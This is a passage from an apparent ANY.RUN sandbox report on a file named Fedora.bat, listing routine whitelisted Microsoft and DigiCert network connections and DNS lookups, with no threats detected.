http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7828
backgroundTaskHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.166:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
7668
SIHClient.exe
GET
200
23.209.214.100:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7668
SIHClient.exe
GET
200
23.209.214.100:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5496
MoUsoCoreWorker.exe
23.48.23.166:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4164
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2104
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3216
svchost.exe
40.113.110.67:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
20.190.160.130:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
7828
backgroundTaskHost.exe
20.223.35.26:443
arc.msn.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
7828
backgroundTaskHost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 23.48.23.166
  • 23.48.23.169
  • 23.48.23.180
  • 23.48.23.173
  • 23.48.23.156
  • 23.48.23.143
  • 23.48.23.177
  • 23.48.23.193
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
client.wns.windows.com
  • 40.113.110.67
whitelisted
login.live.com
  • 20.190.160.130
  • 20.190.160.5
  • 40.126.32.74
  • 40.126.32.134
  • 20.190.160.4
  • 40.126.32.72
  • 40.126.32.140
  • 20.190.160.20
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted
www.bing.com
  • 2.19.122.49
  • 2.19.122.46
  • 2.19.122.56
  • 2.19.122.51
  • 2.19.122.58
  • 2.19.122.55
  • 2.19.122.48
  • 2.19.122.47
  • 2.19.122.54
whitelisted
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted
www.microsoft.com
  • 23.209.214.100
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Fedora.bat